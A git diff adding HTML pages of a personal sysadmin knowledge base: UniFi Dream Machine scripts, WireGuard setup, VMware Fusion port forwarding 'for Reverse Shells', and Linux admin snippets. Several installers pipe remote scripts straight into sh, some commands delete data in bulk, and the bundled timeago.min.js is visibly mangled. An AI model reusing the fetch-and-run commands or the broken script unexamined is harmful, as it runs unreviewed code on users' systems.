diff --git a/infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/index.html b/infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/index.html
new file mode 100644
index 000000000..599ec128f
--- /dev/null
+++ b/infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/index.html
@@ -0,0 +1,169 @@
+
Better Fan Speeds - 3os udm ubiquiti unifi Authors: fire1ce | Created: 2022-07-23 | Last update: 2022-08-02 UDM Better Fan Speeds Github Repository: UDM Better Fan Speeds
Repository Deprecation Notice Repository Deprecation Notice: This project is now deprecated and archived due to the release of UniFi's firmware v2.x and v3.x for Dream Machnines, which natively fix the fan speed issues.
This repository only works with firmware 1.x. UDM-PRO Please consider upgrading your firmware for improved functionality.
What It Does It stops the build in service that monitors the thermal values, fan speed and connection of a HDD/SSD. After that it sets the thermal/fan chip (adt7475) to automatic mode. Once that is done it changes the thermal and fan threshold values specified in the script. If you like, you can change the values to your own preferences.
Compatibility WARNING USE THIS ON YOUR OWN RISK. If you apply inappropriate settings with this script, you will possibly (soft- or hard-) brick your equipment.
Requirements Persistence on Reboot is required. This can be accomplished with a boot script. Flow this guide: UDM Boot Script
Installation curl -s https://raw.githubusercontent.com/fire1ce/UDM-Better-Fan-Speeds/main/install.sh | sh
+
Configuration You can edit the fan-speed settings at
/mnt/data/on_boot.d/11-udm-better-fan-speed.sh
+
Credit Based on renedis/ubnt-auto-fan-speed by ReneDIS . Thanks
Back to top
\ No newline at end of file
diff --git a/infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/index.html b/infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/index.html
new file mode 100644
index 000000000..c4b81fed7
--- /dev/null
+++ b/infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/index.html
@@ -0,0 +1,168 @@
+
UDM Cloudflare DDNS - 3os udm ubiquiti unifi cloudflare Authors: fire1ce | Created: 2022-07-23 | Last update: 2022-08-02 UDM Cloudflare DDNS Github Repository: UDM Cloudflare DDNS
Change Log 2022-22-2 - Major Update for UDM v2.x and v3.x What It Does This will allow to to span a container with podman
to handle DDNS updates for main internet IP address. The container will run the background without any system permissions.
Compatibility Requirements Persistence on Reboot is required. This can be accomplished with a boot script. Flow this guide: UDM Boot Script
Creating a Cloudflare API token To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone
Grant the token the following permissions: - Zone - DNS - Edit Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard. Use the generated token at the API_KEY
variable for the container Installation curl -s https://raw.githubusercontent.com/fire1ce/UDM-Cloudflare-DDNS/main/install.sh | sh
+
Configuration will be updated soon
Back to top
\ No newline at end of file
diff --git a/infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/index.html b/infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/index.html
new file mode 100644
index 000000000..0be675d68
--- /dev/null
+++ b/infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/index.html
@@ -0,0 +1,214 @@
+
Wireguard VPN - 3os udm ubiquiti unifi wireguard Authors: fire1ce | Created: 2022-06-25 | Last update: 2022-08-05 Wireguard VPN WireGuard® is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPsec, while avoiding the massive headache. It intends to be considerably more performant than OpenVPN. WireGuard is designed as a general purpose VPN for running on embedded interfaces and super computers alike, fit for many different circumstances. Initially released for the Linux kernel, it is now cross-platform (Windows, macOS, BSD, iOS, Android) and widely deployable. It is currently under heavy development, but already it might be regarded as the most secure, easiest to use, and simplest VPN solution in the industry.
Github Repository: wireguard-vyatta-ubnt
A guide on installing and using the WireGuard kernel module and tools on Ubiquiti UnifiOS routers (UDM, UDR, and UXG).
Installation Download the latest release for UnifiOS. Use the correct link in the command below
curl -Lfo UnifiOS-wireguard.tar.gz https://github.com/WireGuard/wireguard-vyatta-ubnt/releases/download/${ RELEASE } /UnifiOS-${ RELEASE } .tar.gz
+
Extract the files to your data directory and run the setup script.
For the UDM/P or UXG-Pro, extract the files into /mnt/data/wireguard
tar -C /mnt/data -xvf UnifiOS-wireguard.tar.gz
+/mnt/data/wireguard/setup_wireguard.sh
+
For the UDM-SE or UDR, extract the files into /data/wireguard
tar -C /data -xvf UnifiOS-wireguard.tar.gz
+/data/wireguard/setup_wireguard.sh
+
The setup script will load the wireguard module, and setup the symbolic links for the wireguard tools (wg-quick and wg). You can run dmesg
to verify the kernel module was loaded. You should see something like the following:
[ 13540 .520120] wireguard: WireGuard 1 .0.20210219 loaded. See www.wireguard.com for information.
+[ 13540 .520126] wireguard: Copyright ( C) 2015 -2019 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
+
Now you should be able to create a wireguard interface. Please see usage below.
Compatibility The wireguard module and tools included in this package have been tested on the following Ubiquiti devices:
Unifi Dream Machine (UDM) and UDM-Pro 0.5.x, 1.9.x, 1.10.x, 1.11.x. UDM-SE and Unifi Dream Router (UDR) 2.2.x UniFi Next-Gen Gateway (UXG-Pro) 1.11.x Note that for the UDM, UDM Pro, and UXG-Pro, Ubiquiti includes the wireguard module in the official kernel since firmware 1.11.0-14, but doesn't include the WireGuard tools. The setup script in this package will try to load the built-in wireguard module if it exists first.
Upgrade Unload the wireguard module.
Re-install wireguard by following the Installation instructions above to get the latest version.
Uninstallation Delete the wireguard files from your data directory.
rm -rf /mnt/data/wireguard
+
Delete the wireguard tools and any boot scripts.
rm /usr/bin/wg /usr/bin/wg-quick
+
Usage Read the documentation on WireGuard.com for general WireGuard concepts. Here is a simple example of a wireguard server configuration for UnifiOS.
Create the server and client public/private key pairs by running the following. This will create the files privatekey_server
, publickey_server
and privatekey_client1
, publickey_client1
. These contain the public and private keys. Store these files somewhere safe.
wg genkey | tee privatekey_server | wg pubkey > publickey_server
+wg genkey | tee privatekey_client1 | wg pubkey > publickey_client1
+
On your UDM/UDR, create a wireguard config under /etc/wireguard
named wg0.conf
. Here is an example server config. Remember to use the correct server private key and the client public key .
[Interface]
+Address = 10.0.2.1/24
+PrivateKey = <server's privatekey>
+ListenPort = 51820
+
+[Peer]
+PublicKey = <client's publickey>
+AllowedIPs = 10.0.2.2/32
+
For your client, you will need a client config like the following example. Remember to use the correct client private key and the server public key .
[Interface]
+Address = 10.0.2.2/32
+PrivateKey = <client's privatekey>
+
+[Peer]
+PublicKey = <server's publickey>
+Endpoint = <server's ip>:51820
+AllowedIPs = 10.0.2.0/24
+
Adjust Address to change the IP of the client. Adjust AllowedIPs to set what your client should route through the tunnel. Set to 0.0.0.0/0,::/0
to route all the client's Internet through the tunnel. See the WireGuard documentation for more information. Note each different client requires their own private/public key pair, and the public key must be added to the server's WireGuard config as a separate Peer. To bring the tunnel up, run wg-quick up <config>
. Verify the tunnel received a handshake by running wg
. wg-quick up /etc/wireguard/wg0.conf
+
To bring down the tunnel, run wg-quick down <config>
. wg-quick down /etc/wireguard/wg0.conf
+
In your UniFi Network settings, add a WAN_LOCAL (or Internet Local) firewall rule to ACCEPT traffic destined to UDP port 51820 (or your ListenPort if different). Opening this port in the firewall is needed so remote clients can access the WireGuard server. Routing The AllowedIPs parameter in the wireguard config allows you to specify which destination subnets to route through the tunnel.
If you want to route router-connected clients through the wireguard tunnel based on source subnet or source VLAN, you need to set up policy-based routing. Currently, there is no GUI support for policy-based routing in UnifiOS, but it can be set up in SSH by using ip route
to create a custom routing table, and ip rule
to select which clients to route through the custom table.
For a script that makes it easy to set-up policy-based routing rules on UnifiOS, see the split-vpn project.
Binaries Prebuilt binaries are available under releases .
The binaries are statically linked against musl libc to mitigate potential issues with UnifiOS' glibc.
Persistence on Reboot The setup script must be run every time the system is rebooted to link the wireguard tools and load the module. This can be accomplished with a boot script.
For the UDM or UDM Pro, install UDM Utilities on-boot-script by following the instructions here , then create a boot script under /mnt/data/on_boot.d/99-setup-wireguard.sh
and fill it with the following contents. Remember to run chmod +x /mnt/data/on_boot.d/99-setup-wireguard.sh
afterwards.
Click here to see the boot script.
#!/bin/sh
+/mnt/data/wireguard/setup_wireguard.sh
+
For the UDM-SE or UDR, create a systemd boot service to run the setup script at boot. Create a service file under /etc/systemd/system/setup-wireguard.service
and fill it with the following contents. After creating the service, run systemctl daemon-reload && systemctl enable setup-wireguard
to enable the service on boot. Click here to see the boot service.
[Unit]
+Description = Run wireguard setup script
+Wants = network.target
+After = network.target
+
+[Service]
+Type = oneshot
+ExecStart = sh -c 'WGDIR="$(find /mnt/data/wireguard /data/wireguard -maxdepth 1 -type d -name "wireguard" 2>/dev/null | head -n1)" ; "$WGDIR/setup_wireguard.sh"'
+
+[Install]
+WantedBy = multi-user.target
+
Note this only adds the setup script to start at boot. If you also want to bring your wireguard interface up at boot, you will need to add another boot script with your wg-quick up
command.
Troubleshooting Setup script returns error "Unsupported Kernel version XXX" * The wireguard package does not contain a wireguard module built for your firmware or kernel version, nor is there a built-in module in your kernel. Please open an issue and report your version so we can try to update the module. wg-quick up returns error "unable to initialize table 'raw'" * Your kernel does not have the iptables raw module. The raw module is only required if you use `0.0.0.0/0` or `::/0` in your wireguard config's AllowedIPs. A workaround is to instead set AllowedIPs to `0.0.0.0/1,128.0.0.0/1` for IPv4 or `::/1,8000::/1` for IPv6. These subnets cover the same range but do not invoke wg-quick's use of the iptables raw module. Credits Original work to compile WireGuard on UnifiOS by @tusc (wireguard-kmod ).
"WireGuard" and the "WireGuard" logo are registered trademarks of Jason A. Donenfeld.
The built-in gateway DNS does not reply to requests from the WireGuard tunnel The built-in dnsmasq on UnifiOS is configured to only listen for requests from specific interfaces. The wireguard interface name (e.g.: wg0) needs to be added to the dnsmasq config so it can respond to requests from the tunnel. You can run the following to add wg0 to the dnsmasq interface list: echo "interface=wg0" > /run/dnsmasq.conf.d/custom_listen.conf
+killall -9 dnsmasq
+
You can also those commands to PostUp in your wireguard config's Interface section to automatically run them when the tunnel comes up, e.g.: PostUp = echo "interface=%i" > /run/dnsmasq.conf.d/custom_listen.conf; killall -9 dnsmasq
+ PreDown = rm -f /run/dnsmasq.conf.d/custom_listen.conf; killall -9 dnsmasq
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/vmware/vmware-fusion/index.html b/infrastructure/vmware/vmware-fusion/index.html
new file mode 100644
index 000000000..24e880bdc
--- /dev/null
+++ b/infrastructure/vmware/vmware-fusion/index.html
@@ -0,0 +1,172 @@
+
VMware Fusion - 3os vmware vmware-fusion Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-05 VMware Fusion Port Forwarding for Reverse Shells If you use your vm as NAT network "Shared with My Mac" You can forward a port to your host macOS machine.
The network configuration files are stored their respective folders within the VMware Fusion preferences folder.
/Library/Preferences/VMware\ Fusion/
+
In order to find the right network config you can inspect the dhcpd.conf inside of vmnet* folders.
After you found the correct network it should contain a nat.conf file Edit the (with sudo privileges) nat.conf , For UDP protocol edit the section [incomingudp] for TCP protocol edit the [incomingtcp]
In the next example we will forward port 4444 from VM to the 4444 port on the host. You can foreword any port to any port as you like.
After you saved the configuration nat.conf file you must restart VMware's network services
You do NOT need to restart the Virtual Machine
sudo /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli --stop
+sudo /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli --start
+
If you want to test the port forwarding is working as it should here's an example of running simple python webserver on the vm on port 4444 we configured before:
python -m SimpleHTTPServer 4444
+
Now you can test it on the Host machine by browsing to http://localhost:4444
or http://127.0.0.1:4444
Back to top
\ No newline at end of file
diff --git a/js/timeago.min.js b/js/timeago.min.js
new file mode 100644
index 000000000..a8530a5f7
--- /dev/null
+++ b/js/timeago.min.js
@@ -0,0 +1,2 @@
+/* Taken from https://cdnjs.cloudflare.com/ajax/libs/timeago.js/4.0.2/timeago.min.js */
+!function(s,n){"object"==typeof exports&&"undefined"!=typeof module?n(exports):"function"==typeof define&&define.amd?define(["exports"],n):n((s=s||self).timeago={})}(this,function(s){"use strict";var a=["second","minute","hour","day","week","month","year"];function n(s,n){if(0===n)return["just now","right now"];var e=a[Math.floor(n/2)];return 1
=m[t]&&t=m[e]&&e 0) {
+ var locale = nodes[0].getAttribute('locale');
+ timeago.render(nodes, locale);
+ }
+ })
+} else {
+ var nodes = document.querySelectorAll('.timeago');
+ if (nodes.length > 0) {
+ var locale = nodes[0].getAttribute('locale');
+ timeago.render(nodes, locale);
+ }
+}
diff --git a/linux/Network/identify-nics/index.html b/linux/Network/identify-nics/index.html
new file mode 100644
index 000000000..4322bd13a
--- /dev/null
+++ b/linux/Network/identify-nics/index.html
@@ -0,0 +1,198 @@
+ Identify Network Interfaces - 3os linux network Authors: fire1ce | Created: 2022-04-22 | Last update: 2022-04-22 Identify Physical Network Interfaces The Problem Servers usually have a number of physical network interfaces. The network interfaces names in linux host usually won't tell you much about the which physical network interface corresponds to the interface name. Therefor, it creates a problem when you want to use a specific network interface for a specific purpose but you don't know which physical network interface corresponds to the interface name.
The Solution ethtool
tool can be used to identify the physical network interface corresponding to a network interface name.
For this method to work, you need a physical access
to host's network cards and the physical network interfaces should have Led indicator
lights.
Note
This functionality of ethtool may not be supported by all server or network card hardware.
ethtool
usually isn't installed by default on a linux host. You can install it by running the following command (debian example):
Find the network interfaces present on the host and run the following command for each network interface:
or
Now you can use the ethtool
command to identify the physical network interface corresponding to the network interface name.
Example for eth0
network interface name:
ethtool --identify eth0
+
This command will run untill you stop it. When it's running, you should see the LED indicator light blinking
(usually orange) on the physical network interface corresponding to the network interface name.
To get information about the hardware capabilities of the network interface:
output example:
ethtool enp12s0f4
+
+Settings for enp12s0f4:
+ Supported ports: [ FIBRE ]
+ Supported link modes: 1000baseT/Full
+ 10000baseT/Full
+ Supported pause frame use: Symmetric Receive-only
+ Supports auto-negotiation: No
+ Supported FEC modes: None
+ Advertised link modes: 10000baseT/Full
+ Advertised pause frame use: Symmetric
+ Advertised auto-negotiation: No
+ Advertised FEC modes: None
+ Link partner advertised link modes: Not reported
+ Link partner advertised pause frame use: Symmetric
+ Link partner advertised auto-negotiation: No
+ Link partner advertised FEC modes: None
+ Speed: 10000Mb/s
+ Duplex: Full
+ Auto-negotiation: off
+ Port: Direct Attach Copper
+ PHYAD: 255
+ Transceiver: internal
+ Current message level: 0x000000ff ( 255 )
+ drv probe link timer ifdown ifup rx_err tx_err
+ Link detected: yes
+
Back to top
\ No newline at end of file
diff --git a/linux/files-handling/index.html b/linux/files-handling/index.html
new file mode 100644
index 000000000..97425cf49
--- /dev/null
+++ b/linux/files-handling/index.html
@@ -0,0 +1,178 @@
+ Files Handling - 3os linux files-handling Authors: fire1ce | Created: 2021-09-02 | Last update: 2022-07-09 Files Handling NCurses Disk Usage Ncdu is a disk usage analyzer with an ncurses interface.
Delete Large File List - Argument list too long find . -name '*' | xargs rm
+
Change permissions (chmod) to folders and files find . -type d -exec chmod 755 {} +
+find . -type f -exec chmod 644 {} +
+
Recursively chown user and group chown -R user:group /some/path/here
+
Recursively chmod to 775/664 chmod -R a = ,a+rX,u+w,g+w /some/path/here
+
^ ^ ^ ^ adds write to group
+ | | | adds write to user
+ | | adds read to all and execute to all folders ( which controls access)
+ | sets all to ` 000 `
+
Find UID/GID for user
Back to top
\ No newline at end of file
diff --git a/linux/general-snippets/index.html b/linux/general-snippets/index.html
new file mode 100644
index 000000000..86366cf95
--- /dev/null
+++ b/linux/general-snippets/index.html
@@ -0,0 +1,184 @@
+ General Snippets - 3os linux snippets Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-09-22 General Snippets Disable SSH Login Welcome Message To disable
To re-enable
Change Sudo Password Requirement Timeout In Linux To change sudo password timeout limit in Linux, run:
This command will open the /etc/sudoers  file in nano  editor.
Find the following line:
Change it like below the 30 is the number of minutes you want to set the timeout to.
Defaults env_reset, timestamp_timeout = 30
+
Redirect Output to a File and Stdout With tee The command you want is named tee
:
For example, if you only care about stdout:
ls -a | tee output.file
+
If you want to include stderr, do:
program [ arguments...] 2 >& 1 | tee outfile
+
2>&1 redirects channel 2 (stderr/standard error) into channel 1 (stdout/standard output), such that both is written as stdout. It is also directed to the given output file as of the tee command.
Furthermore, if you want to append to the log file, use tee -a as:
program [ arguments...] 2 >& 1 | tee -a outfile
+
Add Permanent Path to Application First find the location of the Application/Service:
find / -name ApplicationName
+
Go to the path where the application is located
cd "../../../ApplicationName"
+
Run this command for ZSH:
echo 'export PATH="' $( pwd ) ':$PATH"' >> ~/.zshrc && source ~/.zshrc
+
Run this command for "shell Profile":
echo 'export PATH="' $( pwd ) ':$PATH"' >> ~/.profile && source ~/.profile
+
Run this command for "shell":
echo 'export PATH="' $( pwd ) ':$PATH"' >> ~/.shellrc && source ~/.shellrc
+
Create Symbolic Links To create a symbolic link in Unix/Linux, at the terminal prompt, enter:
ln -s source_file target_file
+
to remove symbolic link use the rm
command on the link
Open Last Edited File less ` ls -dx1tr /usr/local/cpanel/logs/cpbackup/*| tail -1`
+
Kill Process That Runs More Than X Time Kill cgi after 30 secs:
for i in ` ps -eo pid,etime,cmd| grep cgi| awk '$2 > "00:30" {print $1}' ` ; do kill $i ; done
+
Back to top
\ No newline at end of file
diff --git a/linux/locales-time-zone/index.html b/linux/locales-time-zone/index.html
new file mode 100644
index 000000000..7a2f3c84e
--- /dev/null
+++ b/linux/locales-time-zone/index.html
@@ -0,0 +1,174 @@
+ Locales & Timezone - 3os linux locales timezone Authors: fire1ce | Created: 2021-09-02 | Last update: 2022-08-02 Locales & Timezone Fix Locales (Fix Bash Local Error) Set the Locale, Find the en_US.UTF-8 in the list and select it, at the following screen select it.
dpkg-reconfigure locales
+
Set System Time With Time Zone (timedatectl ntp) Find your time zone with timedatectl list-timezones use grep for easier results:
timedatectl list-timezones | grep "Toronto"
+
The output should look like this:
Now set the Time Zone and active it.
timedatectl set-timezone Asia/Jerusalem
+timedatectl set-ntp true
+
Now test timedatectl status
Check your system time
Back to top
\ No newline at end of file
diff --git a/linux/lvm-partitions/index.html b/linux/lvm-partitions/index.html
new file mode 100644
index 000000000..8827f6df0
--- /dev/null
+++ b/linux/lvm-partitions/index.html
@@ -0,0 +1,173 @@
+ LVM Partitions - 3os linux lvm Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 LVM Partitions Removing LVM Partition and Merging In To / (root partition) Find out the names of the partition with df
You need to unmount the partition before you can delete them and marge backup the data of the partition you would like to delete this example will use "centos-home" as the partition that will be merged to the root partition.
unmount -a
+lvremove /dev/mapper/centos-home
+lvextend -l +100%FREE -r /dev/mapper/centos-root
+
After the merging and before mounting you should remove the partition from fastab
nano /etc/fstab
+mount -a
+
Back to top
\ No newline at end of file
diff --git a/linux/memory-swap/index.html b/linux/memory-swap/index.html
new file mode 100644
index 000000000..bf9fc3967
--- /dev/null
+++ b/linux/memory-swap/index.html
@@ -0,0 +1,170 @@
+ Memory & Swap - 3os linux Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Memory & Swap Who Uses RAM ps aux | awk '{print $6/1024 " MB\t\t" $11}' | sort -n
+
Who Is Using Swap Memory grep VmSwap /proc/*/status 2 >/dev/null | sort -nk2 | tail -n5
+
Clear Cache and Swap echo 3 > /proc/sys/vm/drop_caches && swapoff -a && swapon -a
+
Back to top
\ No newline at end of file
diff --git a/linux/services-and-daemons/index.html b/linux/services-and-daemons/index.html
new file mode 100644
index 000000000..bb3942d53
--- /dev/null
+++ b/linux/services-and-daemons/index.html
@@ -0,0 +1,154 @@
+ Services and daemons - 3os Authors: fire1ce | Created: 2023-01-05 | Last update: 2023-01-05 Services & Daemons In Linux, a service is a program that runs in the background and performs a specific function. A daemon is a type of service that also runs in the background and often starts at boot time. These processes can be controlled using the systemctl or service command. Services and daemons are an important part of the Linux operating system, as they provide various functions and services that allow the system to run smoothly. There are many different types of services and daemons that can be found on a typical Linux system, and you can find more information about them in the documentation for your specific distribution.
Useful systemctl
commands Start the specified service.
systemctl start <service>
+
Stop the specified service.
systemctl stop <service>
+
Restart the specified service.
systemctl restart <service>
+
Enable the specified service to start automatically at boot time.
systemctl enable <service>
+
Disable the specified service from starting automatically at boot time.
systemctl disable <service>
+
Show the current status and runtime information for the specified service.
systemctl status <service>
+
Show the dependencies for the specified service.
systemctl list-dependencies <service>
+
List all installed unit files on the system.
systemctl list-units --all
+
Display Running Services The systemctl command with the grep command will display a list of all running services and daemons on your Linux system. The grep command will search the output of systemctl for the string "running" and only display the lines that contain that string.
systemctl | grep running
+
For more readable output:
systemctl --no-pager | grep running | column -t
+
Display Enabled Services systemctl list-unit-files --state=enabled
is a command that shows a list of unit files that are currently enabled on the system. The --state option specifies the state of the unit files that you want to see. By using --state=enabled, you will see only unit files that are enabled and will be started automatically when the system boots.
systemctl list-unit-files --state= enabled
+
Back to top
\ No newline at end of file
diff --git a/linux/smb-mount-autofs/index.html b/linux/smb-mount-autofs/index.html
new file mode 100644
index 000000000..bf97c2a04
--- /dev/null
+++ b/linux/smb-mount-autofs/index.html
@@ -0,0 +1,186 @@
+ SMB Mount With autofs - 3os smb share autofs mount Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-07-09 SMB Mount With autofs Install autofs cifs-utils
apt install -y autofs cifs-utils
+
Eddit auto.cifs file
Add this to the file: ("media" - is any name for your mount)
media -fstype= cifs,rw,noperm,vers= 3 .0,credentials= /etc/.credentials.txt ://oscar.3os.re/active-share/media
+
Create credentials file
nano /etc/.credentials.txt
+
Add you credentials for the smb mount:
username = YourUser
+password = YourPassword
+
Exit and save:
At the end of the file add: ("/mnt" - mount location, /etc/auto.cifs your config for mounting the SMB Share)
/mnt /etc/auto.cifs --timeout= 600 --ghost
+
Save end exit. Test the mounting.
systemctl start autofs
+cd /mnt/media/
+ls
+
You should see the mount over there. Enable autofs on boot:
systemctl enable autofs
+
SMB Mount on Linux With Credentials sudo apt-get install cifs-utils
+nano ~/.smbcredentials
+
add this to the config.
username = msusername
+password = mspassword
+
Save the file, exit the editor. Change the permissions of the file to prevent unwanted access to your credentials:
chmod 600 ~/.smbcredentials
+
Then edit your /etc/fstab file (with root privileges) to add this line (replacing the insecure line in the example above, if you added it):
//servername/sharename /media/windowsshare cifs vers = 1 .0,credentials= /home/ubuntuusername/.smbcredentials,iocharset= utf8,sec= ntlm 0 0
+
Save the file, exit the editor.
Finally, test the fstab entry by issuing:
If there are no errors, you should test how it works after a reboot. Your remote share should mount automatically.
Back to top
\ No newline at end of file
diff --git a/linux/ssh-hardening-with-rsa-keys/index.html b/linux/ssh-hardening-with-rsa-keys/index.html
new file mode 100644
index 000000000..8da68234f
--- /dev/null
+++ b/linux/ssh-hardening-with-rsa-keys/index.html
@@ -0,0 +1,180 @@
+ SSH Hardening with SSH Keys - 3os linux ssh rsa Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 SSH Hardening with SSH Keys Generating a new SSH key RSA 4096
ssh-keygen -t rsa -b 4096 -C "your_email@example.com"
+
Ed25519 Algorithm
ssh-keygen -t ed25519 -C "your_email@example.com"
+
Automatic Copy RSA Key to The Server ssh-copy-id -i ~/.ssh/id_rsa.pub user@host
+
Manually Copy RSA Key to The Server ssh to the host (do not close this connection
)
mkdir -p ~/.ssh && touch .ssh/authorized_keys
+
copy your public key usually located at ~/.ssh/id_rsa.pub
echo PUCLICK_Key_STRING >> ~/.ssh/authorized_keys
+
SSH Hardening - Disable Password Login edit /etc/ssh/sshd_config
change:
#PasswordAuthentication yes
+
to
PasswordAuthentication no
+
save&exit
restart ssh service:
sudo systemctl restart ssh
+
Danger
Open new SSH season and test login with RSA Keys before closing the existing connection
Optional: change ssh port edit /etc/ssh/sshd_config
change the port to a desired one
save&exit
restart ssh service:
sudo systemctl restart ssh
+
Add Privet id_rsa key to Server copy the id_rsa key to ~/.ssh folder
cd ~/.ssh
+sudo ssh-agent bash
+ssh-add id_rsa
+
Back to top
\ No newline at end of file
diff --git a/linux/ubuntu-debian/disable-ipv6/index.html b/linux/ubuntu-debian/disable-ipv6/index.html
new file mode 100644
index 000000000..ddd127b0e
--- /dev/null
+++ b/linux/ubuntu-debian/disable-ipv6/index.html
@@ -0,0 +1,171 @@
+ Disable IPv6 via Grub - 3os ubuntu debian ipv6 Authors: fire1ce | Created: 2022-06-28 | Last update: 2022-07-17 Disable IPv6 on Ubuntu and Debian Linux Permanently By default, Ubuntu/Debian IPv6 is enabled after installation. This means that the IPv6 stack is active and the host can communicate with other hosts on the same network via IPv6 protocol.
You can disable Ubuntu/Debian by editing the /etc/default/grub
file.
add ipv6.disable=1
to the end of GRUB_CMDLINE_LINUX_DEFAULT
and GRUB_CMDLINE_LINUX
line. Don't change the other values at those lines.
GRUB_CMDLINE_LINUX_DEFAULT = "ipv6.disable=1"
+GRUB_CMDLINE_LINUX = "ipv6.disable=1"
+
The config should look like this:
Update the grub configuration.
Save and exit. Reboot
to apply the changes.
Back to top
\ No newline at end of file
diff --git a/linux/ubuntu-debian/free-port-53/index.html b/linux/ubuntu-debian/free-port-53/index.html
new file mode 100644
index 000000000..2afcbabaa
--- /dev/null
+++ b/linux/ubuntu-debian/free-port-53/index.html
@@ -0,0 +1,170 @@
+ Free Port 53 on Ubuntu - 3os Ubuntu dns Authors: fire1ce | Created: 2022-06-28 | Last update: 2022-06-28 Free Port 53 on Ubuntu What's Using Port 53? When you install Ubuntu (in my case its Server version). It uses systemd-resolved as internal DNS Forwarder.
systemd-resolved is a system service that provides network name resolution to local applications. It implements a caching and validating DNS/DNSSEC stub resolver, as well as an LLMNR resolver and responder.
How to Free Port 53 on Ubuntu If we want to use port 53 for other purposes, we need to free it for example a Pihole DNS
server.
We can do it with the following commands:
sudo sed -r -i.orig 's/#?DNSStubListener=yes/DNSStubListener=no/g' /etc/systemd/resolved.conf
+sudo sh -c 'rm /etc/resolv.conf && ln -s /run/systemd/resolve/resolv.conf /etc/resolv.conf'
+sudo systemctl restart systemd-resolved
+
Back to top
\ No newline at end of file
diff --git a/linux/ubuntu-debian/remove-snap-store/index.html b/linux/ubuntu-debian/remove-snap-store/index.html
new file mode 100644
index 000000000..b8b960b9d
--- /dev/null
+++ b/linux/ubuntu-debian/remove-snap-store/index.html
@@ -0,0 +1,170 @@
+ Remove Snap Store - 3os ubuntu Authors: fire1ce | Created: 2022-06-28 | Last update: 2022-06-28 Remove Snap Store from Ubuntu What Is Snap? Snap is a cross-platform packaging and deployment system developed by Canonical, the makers of Ubuntu, for the Linux platform. It's compatible with most major Linux distros, including Ubuntu, Debian, Arch Linux, Fedora, CentOS, and Manjaro.
How To Remove Snap Store sudo rm -rf /var/cache/snapd/
+sudo apt autoremove --purge snapd gnome-software-plugin-snap
+sudo rm -rf ~/snap
+
Back to top
\ No newline at end of file
diff --git a/linux/ubuntu-debian/unattended-upgrades/index.html b/linux/ubuntu-debian/unattended-upgrades/index.html
new file mode 100644
index 000000000..ba4522463
--- /dev/null
+++ b/linux/ubuntu-debian/unattended-upgrades/index.html
@@ -0,0 +1,250 @@
+ Unattended Upgrades - 3os ubuntu Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Unattended Upgrades sudo apt install -y unattended-upgrades apt-listchanges
+
Edit the config to your preference
sudo nano /etc/apt/apt.conf.d/50unattended-upgrades
+
Example
Ubuntu Debian/RaspberyOS
Unattended-Upgrade::Allowed-Origins {
+"${distro_id}:${distro_codename}";
+"${distro_id}:${distro_codename}-security";
+// Extended Security Maintenance; doesn't necessarily exist for
+// every release and this system may not have it installed, but if
+// available, the policy for updates is such that unattended-upgrades
+// should also install from here by default.
+"${distro_id}ESMApps:${distro_codename}-apps-security";
+"${distro_id}ESM:${distro_codename}-infra-security";
+"${distro_id}:${distro_codename}-updates";
+"${distro_id}:${distro_codename}-proposed";
+// "${distro_id}:${distro_codename}-backports";
+};
+
+Unattended-Upgrade::DevRelease "auto";
+Unattended-Upgrade::AutoFixInterruptedDpkg "true";
+Unattended-Upgrade::MinimalSteps "true";
+Unattended-Upgrade::InstallOnShutdown "false";
+//Unattended-Upgrade::Mail "";
+//Unattended-Upgrade::MailReport "on-change";
+Unattended-Upgrade::Remove-Unused-Kernel-Packages "true";
+Unattended-Upgrade::Remove-New-Unused-Dependencies "true";
+Unattended-Upgrade::Remove-Unused-Dependencies "true";
+Unattended-Upgrade::Automatic-Reboot "true";
+Unattended-Upgrade::Automatic-Reboot-WithUsers "true";
+Unattended-Upgrade::Automatic-Reboot-Time "06:00";
+//Acquire::http::Dl-Limit "70";
+// Unattended-Upgrade::SyslogEnable "false";
+// Unattended-Upgrade::SyslogFacility "daemon";
+// Unattended-Upgrade::OnlyOnACPower "true";
+// Unattended-Upgrade::Skip-Updates-On-Metered-Connections "true";
+// Unattended-Upgrade::Verbose "false";
+// Unattended-Upgrade::Debug "false";
+// Unattended-Upgrade::Allow-downgrade "false";
+
Unattended-Upgrade::Origins-Pattern {
+// Codename based matching:
+// This will follow the migration of a release through different
+// archives (e.g. from testing to stable and later oldstable).
+// Software will be the latest available for the named release,
+// but the Debian release itself will not be automatically upgraded.
+"origin=Debian,codename=${distro_codename}-updates";
+// "origin=Debian,codename=${distro_codename}-proposed-updates";
+"origin=Debian,codename=${distro_codename},label=Debian";
+"origin=Debian,codename=${distro_codename},label=Debian-Security";
+
+// Archive or Suite based matching:
+// Note that this will silently match a different release after
+// migration to the specified archive (e.g. testing becomes the
+// new stable).
+// "o=Debian,a=stable";
+// "o=Debian,a=stable-updates";
+// "o=Debian,a=proposed-updates";
+// "o=Debian Backports,a=${distro_codename}-backports,l=Debian Backports";
+};
+
+Unattended-Upgrade::DevRelease "auto";
+Unattended-Upgrade::AutoFixInterruptedDpkg "true";
+Unattended-Upgrade::MinimalSteps "true";
